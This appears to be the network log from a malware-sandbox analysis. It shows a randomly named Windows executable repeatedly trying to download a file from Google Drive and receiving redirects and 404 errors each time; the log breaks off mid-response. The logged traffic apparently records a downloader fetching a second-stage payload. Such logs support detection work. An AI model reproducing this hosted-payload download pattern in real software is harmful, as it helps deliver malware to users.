                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:26:44 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:26:44 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Content-Security-Policy: script-src 'nonce-TH2_lrjDcyGSYwrAaoxDCA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    43192.168.2.549982142.250.181.334432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:26:46 UTC459OUTGET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Cache-Control: no-cache
                                                                    Host: drive.usercontent.google.com
                                                                    Connection: Keep-Alive
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:26:47 UTC1854INHTTP/1.1 404 Not Found
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:26:47 GMT
                                                                    Content-Security-Policy: script-src 'nonce-HSHo8qZeZwI-myifIfl6-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Content-Length: 1652
                                                                    X-GUploader-UploadID: AFiumC73LT_8RIbikhZ7aMiadkkYH_dbkzfuvlksbtgts_h_5wRkMowMV1a1kz-E6f8m-KirCUt8UG8o1w
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                    Connection: close
                                                                    2024-12-03 16:26:47 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 41 6d 67 72 54 69 6d 6e 53 58 43 73 33 39 66 58 67 64 54 4e 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UAmgrTimnSXCs39fXgdTNQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    44192.168.2.549983172.217.19.1744432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:26:49 UTC417OUTGET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:26:50 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:26:50 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Content-Security-Policy: script-src 'nonce-XsBHOkHnv2Qu8Uy64U-i6Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    45192.168.2.549984142.250.181.334432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:26:52 UTC459OUTGET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Cache-Control: no-cache
                                                                    Host: drive.usercontent.google.com
                                                                    Connection: Keep-Alive
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:26:53 UTC1854INHTTP/1.1 404 Not Found
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:26:53 GMT
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Content-Security-Policy: script-src 'nonce-j7fetvVzqsPu9BS6yq2COg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Content-Length: 1652
                                                                    X-GUploader-UploadID: AFiumC6_3xX-Gvc5Btci_WjemGG-N6XqsJTeKUEdMi-CBxaFvhoN_sr15Cp3jiaOs_R-lmgTQHBxrc0dUg
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                    Connection: close
                                                                    2024-12-03 16:26:53 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 76 31 43 47 46 4e 6b 5a 30 46 57 52 4c 45 38 47 63 45 71 47 41 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="v1CGFNkZ0FWRLE8GcEqGAw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    46192.168.2.549985172.217.19.1744432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:26:55 UTC417OUTGET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:26:56 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:26:56 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Content-Security-Policy: script-src 'nonce-0A5KNhajhD-XiNeyDYSxpQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    47192.168.2.549986142.250.181.334432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:26:58 UTC459OUTGET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Cache-Control: no-cache
                                                                    Host: drive.usercontent.google.com
                                                                    Connection: Keep-Alive
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:26:59 UTC1854INHTTP/1.1 404 Not Found
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:26:58 GMT
                                                                    Content-Security-Policy: script-src 'nonce-AwDv4fGpx1CodjAZxGju-Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Content-Length: 1652
                                                                    X-GUploader-UploadID: AFiumC7lRDRY4LukXcieZVLZlEzHLEMOXx6s-vItBjhAUiSaRMO69b6s11pT1M4_d4axgBkRCYcW_P7rnA
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                    Connection: close
                                                                    2024-12-03 16:26:59 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6b 39 56 55 6e 58 72 61 70 66 34 56 50 37 77 30 34 72 63 70 39 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="k9VUnXrapf4VP7w04rcp9Q">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    48192.168.2.549987172.217.19.1744432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:27:01 UTC417OUTGET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:27:02 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:27:01 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy: script-src 'nonce-hmCFMNEWAg7Umzot_5ha8w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    49192.168.2.549988142.250.181.334432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:27:03 UTC459OUTGET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Cache-Control: no-cache
                                                                    Host: drive.usercontent.google.com
                                                                    Connection: Keep-Alive
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:27:04 UTC1854INHTTP/1.1 404 Not Found
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:27:04 GMT
                                                                    Content-Security-Policy: script-src 'nonce-yB9yYCz8zb4cXKMSspmcuQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Content-Length: 1652
                                                                    X-GUploader-UploadID: AFiumC4hHvH6RYzte-I48Xq0kC0xqUmDeVx-Pd46JFd10TRsgzJJ_UU3rOuX2e9hMfqCFNHEvLb0fqwJdQ
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Content-Security-Policy: sandbox allow-scripts
